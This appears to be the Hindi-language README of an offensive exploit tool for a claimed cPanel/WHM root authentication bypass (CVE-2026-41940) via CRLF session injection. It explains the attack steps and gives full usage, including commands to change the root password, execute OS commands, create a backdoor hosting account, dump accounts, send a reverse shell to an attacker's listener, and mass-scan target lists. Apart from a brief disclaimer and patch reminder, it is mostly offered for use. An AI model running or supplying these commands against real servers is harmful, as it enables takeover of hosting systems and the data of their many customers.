
cPanel/WHM प्रमाणीकरण बाईपास (ज़ीरो-डे भेद्यता)
अस्वीकरण: यह दस्तावेज़ और संबद्ध स्क्रिप्ट (
exploit.py) केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए प्रदान की गई है। इस सॉफ़्टवेयर का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
exploit.py एक स्क्रिप्ट है जो cPanel & WHM में प्रमाणीकरण बाईपास भेद्यता (CVE-2026-41940) को प्रदर्शित करती है। यह भेद्यता एक अनधिकृत हमलावर को CRLF इंजेक्शन दोष के माध्यम से डेमन कैश में रूट सत्र इंजेक्ट करने की अनुमति देती है, जिससे अंततः वैध क्रेडेंशियल्स की आवश्यकता के बिना रूट-स्तरीय WHM पहुँच प्राप्त होती है।
यह एक्सप्लॉइट बेसिक प्रमाणीकरण हैंडलिंग तंत्र के भीतर CRLF (कैरिज रिटर्न लाइन फीड) इंजेक्शन भेद्यता का लाभ उठाकर काम करता है, जो सत्र प्रसार दोष के साथ संयुक्त है। यह स्क्रिप्ट हमले को चार चरणों में स्वचालित करती है:
whostmgrsession) प्राप्त करने के लिए सार्वजनिक लॉगिन एंडपॉइंट्स (जैसे, /login/ या /cgi/login.cgi) से कनेक्ट होता है।cpsrvd सत्र कैश में इंजेक्ट करता है। सर्वर का रिडायरेक्ट प्रतिक्रिया उत्पन्न सुरक्षा टोकन (cpsess) को लीक कर देती है।do_token_denied को ट्रिगर करके जाली सत्र को डेमन कैश में प्रसारित करती है — जिससे यह एक वैध प्रमाणित सत्र बन जाता है।/json-api/version) तक पहुँचता है।requests लाइब्रेरीpip install requests
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]
| तर्क | विवरण |
|---|---|
--target URL | एकल WHM URL (जैसे, https://target:2087) |
--target-file FILE | लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक ip:port) — स्वतः चेक मोड सक्षम करता है |
| तर्क | विवरण |
|---|---|
--threads N | बहु-लक्ष्य मोड के लिए समवर्ती थ्रेड (डिफ़ॉल्ट: 10) |
--hostname HOST | Host हेडर ओवरराइड करें — तब उपयोग करें जब स्वतः खोज विफल हो या गलत होस्टनाम दे |
--timeout N | प्रति-अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15) |
--retries N | नेटवर्क त्रुटियों पर पुनः प्रयास गणना (डिफ़ॉल्ट: 3) |
--cookie-name NAME | विशिष्ट सत्र कुकी नाम बलपूर्वक सेट करें (छोड़े जाने पर स्वतः पता लगाया जाता है) |
--no-verify | चरण 4 सत्यापन छोड़ें और फिर भी आगे बढ़ें |
| तर्क | विवरण |
|---|---|
--check | केवल-जाँच मोड — शोषण किए बिना भेद्यता सत्यापित करें (--target-file के साथ स्वतः सेट होता है) |
--password PASS | रूट पासवर्ड को PASS में बदलें |
--api FUNC | विशिष्ट WHM JSON-API फ़ंक्शन को कॉल करें |
--api-params K=V,... | --api के लिए अल्पविराम-पृथक पैरामीटर |
--exec CMD | WHM scripts/run_script के माध्यम से OS कमांड निष्पादित करें (फ़ॉलबैक: rawexec) |
--session | रूट वन-क्लिक लॉगिन URL उत्पन्न करें — तुरंत खोलें, टोकन जल्दी समाप्त हो जाता है |
--shell | इंटरैक्टिव WHM शेल में प्रवेश करें (केवल एकल लक्ष्य) |
--dump | सर्वर जानकारी डंप करें: संस्करण, खाते, DNS ज़ोन, विशेषाधिकार |
--add-user USER PASS DOMAIN | नया cPanel होस्टिंग खाता बनाएँ |
--revshell LHOST LPORT | आपके लिसनर को bash रिवर्स शेल भेजें |
| तर्क | विवरण |
|---|---|
--output FILE | सत्र टोकन और विवरण को JSON फ़ाइल में सहेजें |
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check
# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump
# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session
# Execute a command
python exploit.py --target https://target:2087 --exec "id"
# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell
# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'
# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20
# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json
--shell का उपयोग करते समय, निम्नलिखित कमांड उपलब्ध हैं:
| कमांड | विवरण |
|---|---|
api <function> [k=v ...] | WHM JSON-API फ़ंक्शन को कॉल करें (जैसे, api version) |
exec <command> | WHM के माध्यम से OS कमांड चलाएँ (जैसे, exec id) |
passwd <newpass> | रूट पासवर्ड बदलें |
dump | सर्वर जानकारी डंप करें |
revshell <lhost> <lport> | रिवर्स शेल भेजें |
add <user> <pass> <domain> | cPanel खाता बनाएँ |
save <path> | वर्तमान सत्र को फ़ाइल में सहेजें |
exit / quit | शेल से बाहर निकलें |
नवीनतम cPanel/WHM सुरक्षा पैच तुरंत अपडेट करें।